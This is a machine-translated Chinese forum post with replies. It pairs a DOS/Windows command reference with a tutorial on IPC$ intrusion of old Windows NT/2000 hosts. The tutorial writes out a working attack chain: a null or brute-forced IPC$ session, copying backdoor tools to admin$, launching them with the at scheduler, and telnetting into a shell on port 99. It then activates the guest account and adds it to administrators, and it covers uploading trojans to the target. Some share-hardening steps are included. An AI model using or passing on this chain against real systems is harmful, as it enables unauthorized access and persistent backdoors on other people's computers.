中国DOS联盟

DOS Common Commands:
dir list file names deltree delete directory tree cls clear screen cd change current directory
copy copy files diskcopy copy disk del delete file format format disk
edit text editing mem view memory status md create subdirectory move move files, change directory name
more display in pages type display file content rd delete directory sys make DOS system disk
ren change file name xcopy copy directories and files chkdsk check disk attrib set file attributes
fdisk hard disk partition date display and modify date label set volume label defrag disk defragmentation
msd system detection path set search directory share file sharing memmaker memory optimization management
help help restore restore backup files set set environment variables time display and modify time
tree list directory tree debug random debugging program doskey re-call DOS commands prempt set prompt undelete recover deleted files scandisk detect and repair disk

Uncommon DOS Commands
diskcomp disk comparison　 append set non-executable file path
expand restore DOS file fasthelp quickly display help information
fc file comparison interink start server
setver set version intersvr start client
subst path substitution qbasic Basic integrated environment
vsafe anti-virus unformat recover formatted disk
ver display DOS version number smartdrv set disk accelerator
vol display disk volume label lh load program into upper memory
ctty change control device emm386 extended memory management
Detailed Introduction of Common Commands:

I. Dir
Displays a list of directory files and subdirectories. Well, this is definitely something everyone needs to know.
Wildcards (? and *) can be used. ? represents matching one character, and * represents matching any character
*.suffix
Specifies the files to view by suffix. Actually, it can also be ".suffix" above. For example, dir *.exe is equivalent to dir .exe
/p
Displays one list screen at a time. To view the next screen, press any key on the keyboard.
/w
Displays the list in wide format, showing up to 5 file names or directory names per line.
/s
Lists each specified file name that appears in the specified directory and all subdirectories. Much faster than the find in the win environment
dir *.* -> a.txt writes the current directory file list to a.txt
dir *.* /s -> a.txt writes the current directory file list to a.txt, including files in subdirectories.

II. Attrib
Displays, sets, or deletes the read-only, archive, system, and hidden attributes assigned to files or directories. If used without parameters, attrib displays the attributes of all files in the current directory.
+r
Set read-only attribute.
-r
Clear read-only attribute.
+a
Set archive file attribute.
-a
Clear archive file attribute.
+s
Set system attribute.
-s
Clear system attribute.
+h
Set hidden attribute.
-h
Clear hidden attribute.

III. Cls
Clears all information displayed in the command prompt window and returns an empty window, that is, "clear screen"

IV. Exit
Exits the current command interpreter and returns to the system.

V. Format
Format
/q
Performs a quick format. Deletes the file table and root directory of a previously formatted volume but does not scan for damaged areas between sectors. Using the /q command-line option should only format a previously formatted intact volume.

VI. Ipconfig
Displays all current TCP/IP network configuration values, refreshes the Dynamic Host Configuration Protocol (DHCP) and Domain Name System (DNS) settings. Using ipconfig without parameters displays the IP address, subnet mask, and default gateway for all adapters.
/all
Displays complete TCP/IP configuration information for all adapters.
ipconfig is equivalent to winipcfg, which is available on ME, 98, and 95. Although Windows XP does not provide a graphical interface like the winipcfg command, you can use "Network Connections" to view and update the IP address. To do this, open Network Connections, right-click a network connection, click "Status", and then click the "Support" tab.
This command is most suitable for computers configured to obtain an IP address automatically. It allows users to determine which TCP/IP configuration values are configured by DHCP, Automatic Private IP Address (APIPA), and other configurations.

VII. Md
Create a directory or subdirectory

VIII. Move
Moves one or more files from one directory to the specified directory.

IX. Nbtstat
Displays NetBIOS statistics, NetBIOS name tables, and NetBIOS name caches based on the TCP/IP (NetBT) protocol for the local computer and remote computer. Nbtstat can refresh the NetBIOS name cache and registered Windows Internet Name Service (WINS) names. Using nbtstat without parameters displays help. Nbtstat command-line parameters are case-sensitive.
-a remotename
Displays the NetBIOS name table of the remote computer, where RemoteName is the NetBIOS computer name of the remote computer.
-A IPAddress
Displays the NetBIOS name table of the remote computer, whose name is specified by the IP address of the remote computer (separated by periods).

X. Netstat
Displays active TCP connections, ports on which the computer is listening, Ethernet statistics, the IP routing table, IPv4 statistics (for IP, ICMP, TCP, and UDP protocols), and IPv6 statistics (for IPv6, ICMPv6, TCP over IPv6, and UDP over IPv6 protocols). When used without parameters, netstat displays active TCP connections.
-a
Displays all active TCP connections and TCP and UDP ports on which the computer is listening.

XI. Ping
Verifies the IP-level connection to another TCP/IP computer by sending "Internet Control Message Protocol (ICMP)" echo request messages. The reception of echo response messages and the number of round-trip processes are displayed together. Ping is the main TCP/IP command used to troubleshoot network connectivity, reachability, and name resolution. If used without parameters, ping displays help. Name and IP address resolution is its simplest application and also the most used.
-t
Specifies that ping can continuously send echo request messages to the destination until interrupted. To interrupt and display statistics, press CTRL-BREAK. To interrupt and exit ping, press CTRL-C.
-l size
Specifies the length (in bytes) of the "data" field in the sent echo request message. The default is 32. The maximum value of size is 65,527.

XII. Rename (Ren)
Changes the name of a file.
For example, ren *.abc *.cba

XIII. Set
Displays, sets, or deletes environment variables. If there are no parameters, the set command displays the current environment settings.

XIV. Shutdown
Allows you to shut down or restart a local or remote computer. If no parameters are used, shutdown logs off the current user.
-m ComputerName
Specifies the computer to shut down.
-t xx
Sets the timer for system shutdown to xx seconds. The default is 20 seconds.
-l
Logs off the current user, which is the default setting. -m ComputerName has priority.
-s
Shuts down the local computer.
-r
Shuts down and then restarts.
-a
Aborts the shutdown. The system ignores other parameters except -l and ComputerName. You can only use -a during the timeout period.

XV. System File Checker (sfc)
Only available under win, scans and verifies all protected system files after restarting the computer.
/scannow
Immediately scans all protected system files.
/scanonce
Scans all protected system files once.
/purgecache
Immediately clears the "Windows File Protection" file cache and scans all protected system files.
/cachesize=x
Sets the size of the "Windows File Protection" file cache in MB.

XVI. Type
Displays the contents of a text file. Use the type command to view a text file or a bat file without modifying the file

XVII. Tree
Graphically displays the directory structure of a path or drive's disk.

XVIII. Xcopy
Copies files and directories, including subdirectories.
/s
Copies non-empty directories and subdirectories. If /s is omitted, xcopy works in a single directory.
/e
Copies all subdirectories, including empty directories.

XIX. copy
Copies one or more files from one location to another

XX. Del
Deletes the specified file.
The subcommands of ftp, bat batch commands, net, and telnet are too many, so they are not mentioned here. However, these are all commonly used.



Detailed Explanation of IPC$ Commands:
There are countless articles on the Internet about IPC$ intrusion, and there are also many excellent ones. The attack steps can even be said to have become a classic model, so no one is willing to take out this established thing to play with again.
However, having said that, I personally think these articles are not detailed enough. For novices who are first exposed to IPC$, simply listing the steps cannot answer many of their confusions (you can randomly search for IPC on any hack forum and see how many doubts there are).
Therefore, I wrote this tutorial that is equivalent to clarifying doubts. I want to make clear some confusing and puzzling issues so that everyone doesn't always stay in place! If you still have questions after reading this post, please reply immediately!

II. What is IPC$
IPC$ (Internet Process Connection) is a resource that shares "named pipes" (everyone says so). It is a named pipe opened for inter-process communication. You can obtain corresponding permissions by verifying the user name and password. It is used when remotely managing a computer and viewing the shared resources of the computer.
Using IPC$, the connector can even establish an empty connection with the target host without a user name and password (of course, the target machine must have IPC$ sharing enabled, otherwise you cannot connect). With this empty connection, the connector can also obtain the user list on the target host (but a responsible administrator will prohibit exporting the user list).
We always talk about IPC$ vulnerabilities, IPC$ vulnerabilities. In fact, IPC$ is not a real vulnerability. It is a remote network login function opened for the convenience of administrators' remote management, and it also opens default shares, that is, all logical disks (c$, d$, e$...) and the system directory winnt or windows (admin$).
All of these were originally for the convenience of administrators' management, but good intentions do not necessarily have good results. Some malicious people (I don't know what their intentions are, just a pronoun) will use IPC$ to access shared resources, export user lists, and use some dictionary tools to perform password detection, hoping to obtain higher permissions to achieve ulterior motives.
Clarifying Doubts:
1) IPC connection is a unique remote network login function in Windows NT and above systems. Its function is equivalent to Telnet in Unix. Since the IPC$ function needs to use many DLL functions in Windows NT, it cannot run in Windows 9.x.
That is to say, only nt/2000/xp can establish an IPC$ connection. 98/me cannot establish an IPC$ connection (but some friends say that an empty connection can be established under 98. I don't know if it is true or not. But now it's 2003, it is recommended that 98 users change the system. 98 is not enjoyable)
2) Even an empty connection is not 100% successfully established. If the other party has closed the IPC$ sharing, you still cannot establish a connection
3) It does not mean that after establishing an IPC$ connection, you can view the other party's user list, because the administrator can prohibit exporting the user list

III. Role of Establishing an IPC$ Connection in Hack Attacks
As mentioned above, even if you establish an empty connection, you can obtain a lot of information (and these information are often indispensable in intrusion), access some shared resources. If you can log in with a user identity with certain permissions, then you will get corresponding permissions. Obviously, if you log in as an administrator, hey, I don't need to say more, what you want, you can do!!
(It can basically be summarized as obtaining target information, managing target processes and services, uploading trojans and running them. If it is 2000server, you can also consider enabling terminal services for convenient control. How powerful is that!)
But don't be too happy too early, because the administrator's password is not so easy to get. Although there will be some silly administrators using empty passwords or weak passwords, this is after all the minority, and now it's not the same as before. With the improvement of people's security awareness, administrators are becoming more and more careful, and it will be more and more difficult to get the administrator's password :(
Therefore, the most likely thing for you in the future is to connect with very small permissions or even no permissions. You will slowly find that the IPC$ connection is not omnipotent. Even when the host does not enable IPC$ sharing, you simply cannot connect.
So I think, you should not regard IPC$ intrusion as the ultimate weapon, and do not think that it is invincible. It is like a pass before shooting in a football field. It rarely has a deadly effect, but it is indispensable. I think this is the significance of the IPC$ connection in hack intrusion.

IV. Relationship between IPC$, Empty Connection, Port 139, 445, and Default Share
The relationship between the above four may be a problem that novices are very confused about. However, most articles do not make special explanations. In fact, I don't understand it very thoroughly. It is all summarized in communication with everyone. (A BBS with a good discussion atmosphere can be said to be a paradise for novices)
1) IPC$ and empty connection:
An IPC$ connection that does not require a user name and password is an empty connection. Once you log in with a certain user or administrator identity (that is, with a specific user name and password to establish an IPC$ connection), it naturally cannot be called an empty connection.
Many people may ask, since an empty connection can be made, then I will just use the empty connection in the future. Why go to so much trouble to scan weak passwords. Hehe, the reason was mentioned earlier. When you log in with an empty connection, you have no permissions (very depressed, right). When you log in with a user or administrator identity, you will have corresponding permissions (who doesn't want permissions, so just scan honestly, don't be lazy).
2) IPC$ and ports 139, 445:
The IPC$ connection can implement remote login and access to default shares; and the opening of port 139 indicates the application of the netbios protocol. We can access shared files/printers through ports 139, 445 (win2000). Therefore, generally speaking, the IPC$ connection needs the support of port 139 or 445.
3) IPC$ and default share
The default share is a default-enabled share for the convenience of administrators' remote management (you can certainly close it), that is, all logical disks (c$, d$, e$...) and the system directory winnt or windows (admin$). We can access these default shares through the IPC$ connection (provided that the other party has not closed these default shares)

V. Reasons for IPC$ Connection Failure
The following 5 reasons are more common:
1) Your system is not an NT or above operating system;
2) The other party has not opened the IPC$ default share
3) The other party has not enabled port 139 or 445 (or is blocked by the firewall)
4) Your command input is incorrect (such as missing spaces, etc.)
5) The user name or password is incorrect (it doesn't matter for an empty connection)
In addition, you can also analyze the reason according to the returned error number:
Error number 5, access denied: It is very likely that the user you are using is not an administrator permission. First, elevate the permission;
Error number 51, Windows cannot find the network path: There is a problem with the network;
Error number 53, cannot find the network path: The IP address is incorrect; the target is not powered on; the target lanmanserver service is not started; the target has a firewall (port filtering);
Error number 67, cannot find the network name: Your lanmanworkstation service is not started; the target has deleted IPC$;
Error number 1219, the provided credentials conflict with the existing credentials set: You have already established an IPC$ with the other party. Please delete it and connect again.
Error number 1326, unknown user name or incorrect password: The reason is obvious;
Error number 1792, trying to log in, but the network login service is not started: The target NetLogon service is not started. (This situation will occur when connecting to a domain controller)
Error number 2242, the password of this user has expired: The target has an account policy that forcibly requires changing the password regularly.
The problem of IPC$ not connecting is relatively complicated. In addition to the above reasons, there will be other uncertain factors. I can't explain it in detail and definitely here. It depends on everyone's own experience and experiments.

VI. How to Open the Target's IPC$ (This section is quoted from related articles)
First, you need to obtain a shell that does not depend on IPC$, such as sql's cmd extension, telnet, trojan. Of course, this shell must be of admin permission. Then you can use the shell to execute the command net share ipc$ to open the target's IPC$. From the above, you can know that there are still many conditions for IPC$ to be usable. Please confirm that the relevant services are all running. If not, start it (if you don't know how to do it, please refer to the usage of the net command). If it still doesn't work (such as having a firewall and unable to kill it), it is recommended to give up.

VII. How to Prevent IPC$ Intrusion
1. Forbid enumeration by empty connection (this operation does not prevent the establishment of an empty connection, quoted from "Anatomy of Empty Sessions under win2000")
First, run regedit, find the following component and change the key value of RestrictAnonymous = DWORD to: 00000001 (if set to 2, some problems will occur, such as some WIN services having problems, etc.)
2. Forbid default share
1) View local shared resources
Run-cmd-enter net share
2) Delete share (enter one each time）
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete (if there are e, f, etc., you can continue to delete)
3) Stop the server service
net stop server /y (the server service will restart after restarting)
4) Modify the registry
Run-regedit
For server version: find the following primary key and change the key value of AutoShareServer (DWORD) to: 00000000.
For pro version: find the following primary key and change the key value of AutoShareWks (DWORD) to: 00000000.
If the above-mentioned primary key does not exist, create a new one (right-click - new - double-byte value) and then change the key value.
3. Permanently close the services on which IPC$ and default share depend: lanmanserver is the server service
Control Panel-Administrative Tools-Services-Find the server service (right-click)-Properties-General-Startup type-Disabled
4. Install a firewall (select relevant settings), or port filtering (filter ports 139, 445, etc.), or use a new version of Optimizer
5. Set a complex password to prevent password brute-force through IPC$

VIII. Related Commands
1) Establish an empty connection:
net use \\IP\ipc$ "" /user:"" (Be sure to note: There are 3 spaces in this line of command)
2) Establish a non-empty connection:
net use \\IP\ipc$ "username" /user:"password" (There are also 3 spaces)
3) Map the default share:
net use z: \\IP\c$ "password" /user:"username" (You can map the other party's C drive as your own Z drive, and other drives are similar)
If you have already established an IPC$ with the target, you can directly access it using IP + drive letter + $, the specific command is net use z: \\IP\c$
4) Delete an IPC$ connection
net use \\IP\ipc$ /del
5) Delete the share mapping
net use c: /del Delete the mapped C drive, and other drives are similar
net use * /del Delete all, there will be a prompt requiring to press y to confirm

IX. Classic Invasion Mode
This invasion mode is too classic. Most IPC tutorials have introduced it, so I just quote it here. Thanks to the original author! (I don't know which senior)
1. C:\>net use \\127.0.0.1\IPC$ "password" /user:"username"
Generally, use Liuguang to get the administrator account and password by scanning weak passwords.

2. C:\>copy srv.exe \\127.0.0.1\admin$
First copy srv.exe上去. It is in the Tools directory of Liuguang (here, $ refers to c:\winnt\system32\ of the admin user. Everyone can also use c$, d$, which means C drive and D drive. It depends on where you want to copy it.)
　　
3. C:\>net time \\127.0.0.1
Check the time. It is found that the current time of 127.0.0.1 is 11:00 AM on 2004/6/15, and the command is successfully completed.
　　
4. C:\>at \\127.0.0.1 11:05 srv.exe
Use the at command to start srv.exe

5. C:\>net time \\127.0.0.1
Check the time again? If the current time of 127.0.0.1 is 11:05 AM on 2004/6/15, then prepare to start the following command.
　　
6. C:\>telnet 127.0.0.1 99
Here, the Telnet command will be used. Note that the port is 99. The default Telnet port is 23, but we use SRV to establish a 99-port Shell for us on the other computer.
Although we can Telnet in, SRV is one-time. Next time we log in, we have to activate it again! So we plan to establish a Telnet service! This requires using ntlm
　　
7.C:\>copy ntlm.exe \\127.0.0.1\admin$
Use the Copy command to upload ntlm.exe to the host (ntlm.exe is also in the Tools directory of "Liuguang").
　　
8. C:\WINNT\system32>ntlm
Enter ntlm to start (here, C:\WINNT\system32> refers to the other computer. Running ntlm actually runs this program on the other computer). When "DONE" appears, it means it has started normally. Then use "net start telnet" to start the Telnet service!

9. Telnet 127.0.0.1, then enter the user name and password to enter the other party. The operation is as simple as operating on DOS! (Then what do you want to do? Do whatever you want, haha)
To be on the safe side, we will activate the guest and add it to the management group

10. C:\>net user guest /active:yes
Activate the other party's Guest user

11. C:\>net user guest 1234
Change the password of Guest to 1234, or the password you want to set

12. C:\>net localgroup administrators guest /add
Change Guest to Administrator (if the administrator password is changed and the guest account is not changed, next time we can use guest to access this computer again)

Common Problems with IPC$:

1. How to establish an empty connection and what is its use?
Answer: Use the command net use \IP\ipc$ "" /user:"" to simply establish an empty connection with the target (the target needs to open IPC$).
For NT, under the default security settings, with the empty connection, you can enumerate target users, shares, access shares with everyone permissions, access a small part of the registry, etc., and it has no utilization value. It is even less useful for 2000. And it is not convenient to implement, and tools are needed.

2. Why can't I connect to IPC$?
Answer:
(1) Only NT/2000/xp and above systems can establish IPC$. If you are using 98/me, you don't have this function.
(2) Confirm that your command is not typed incorrectly. The correct command is: net use \target IPipc$ "password" /user:"username"
Note that there are no extra or missing spaces. When the user name and password do not contain spaces, the double quotes on both sides can be omitted. An empty password is represented by "".

3. Analyze the reason according to the returned error number:
Error number 5, access denied: It is very likely that the user you are using is not an administrator permission. First, elevate the permission;
Error number 51, Windows cannot find the network path: There is a problem with the network;
Error number 53, cannot find the network path: The IP address is incorrect; the target is not powered on; the target lanmanserver service is not started; the target has a firewall (port filtering);
Error number 67, cannot find the network name: Your lanmanworkstation service is not started; the target has deleted IPC$;
Error number 1219, the provided credentials conflict with the existing credentials set: You have already established an IPC$ with the other party. Please delete it and connect again.
Error number 1326, unknown user name or incorrect password: The reason is obvious;
Error number 1792, trying to log in, but the network login service is not started: The target NetLogon service is not started. (This situation will occur when connecting to a domain controller)
Error number 2242, the password of this user has expired: The target has an account policy that forcibly requires changing the password regularly.

4. The problem of IPC$ not connecting is relatively complicated. There is no unified understanding summarized. When experimenting on the chicken, sometimes contradictory conclusions are drawn, which is very tricky. And knowing the problem, if you don't get a shell in other ways, many problems still cannot be solved.

5. How to open the target's IPC$?
Answer: First, you need to obtain a shell that does not depend on IPC$, such as sql's cmd extension, telnet, trojan. Of course, this shell must be of admin permission. Then you can use the shell to execute the command net share ipc$ to open the target's IPC$. From the previous question, you can know that there are still many conditions for IPC$ to be usable. Please confirm that the relevant services are all running. If not, start it (if you don't know how to do it, please refer to the usage of the net command). If it still doesn't work (such as having a firewall and unable to kill it), it is recommended to give up.

6. How to map and access the default share?
Answer: Use the command net use z: \\target IP\c$ "password" /user:"username" to map the other party's C drive as your own Z drive, and other drives are similar.
If you have already established an IPC$ with the target, you can directly access it using IP plus drive letter plus $. For example, copy muma.exe \\IP\d$\path\muma.exe. Or you can map it again, but without the user name and password: net use y: \\IP\d$. Then copy muma.exe y:\path\muma.exe. When the path contains spaces, the entire path must be enclosed in "".

7. How to delete the mapping and IPC$ connection?
Answer: Use the command net use \\IP\ipc$ /del to delete an IPC$ connection with a target.
Use the command net use z: /del to delete the mapped Z drive, and other drives are similar.
Use the command net use * /del to delete all. There will be a prompt requiring to press y to confirm.

8. After connecting to IPC$, what can I do?
Answer: Successfully connecting to IPC$ with an administrator permission account means that you can have in-depth "communication" with the other party's system. You can use various command-line tools (such as pstools series, Win2000SrvReskit, telnethack, etc.) to obtain target information, manage target processes and services, etc. If the target opens the default share (if it is not opened, you can help it open), you can upload a trojan and run it. You can also use methods such as tftp and ftp to upload. Tools (trojans) like dwrcc, VNC, RemoteAdmin also have direct screen control functions. If it is 2000server, you can also consider enabling terminal services for convenient control. For the use of the tools mentioned here, please refer to the自带 instructions or relevant tutorials.

9. How to prevent others from invading me using ips$ and default share?
Answer:
A. One way is to delete IPC$ and default share. But it will still be there after restarting. This requires modifying the registry.
1. First delete the existing ones
net share ipc$ /del
net share admin$ /del
net share c$ /del
………… (Delete as many as there are)
2. Forbid others to make empty connections
First, run regedit, find the following primary key and change the key value of RestrictAnonymous (DWORD) to: 00000002.
3. Forbid automatic opening of default share
For server version, find the following primary key and change the key value of AutoShareServer (DWORD) to: 00000000.
For pro version, it is and change the key value of AutoShareWks (DWORD) to: 00000000.
If the above-mentioned primary key does not exist, create a new one and then change the key value.
B. Another way is to close the services on which IPC$ and default share depend (not recommended)
net stop lanmanserver
There may be a prompt saying that XXX service will also be closed. Do you want to continue? Because there are still some secondary services that depend on lanmanserver. Generally, press y to continue.
C. The simplest way is to set a complex password to prevent password brute-force through IPC$. But if you have other vulnerabilities, IPC$ will provide convenience for further intrusion.
D. Another way is to install a firewall or port filtering.

I've bookmarked it, thanks!

I see the article you wrote. It's very useful to me. Support

I've seen it, saved it, and I'll hide under the covers to read it by myself

It's useful!! Thanks to the楼主

Thanks to the LZ, let me review and learn something new~~~~ Not bad, strong support!!

What a good thing!!!!!!!!!!!!!!!!!!!!!!!!!!!!11

Um!
Thanks!
Useful!

Top...........................Good!

Collect it first and then talk. Thanks to the LZ for sharing!!!!!!!

It's very useful. Thanks to the楼主, I've bookmarked it.

Useful. Useful ah. Thanks to the LZ for sharing.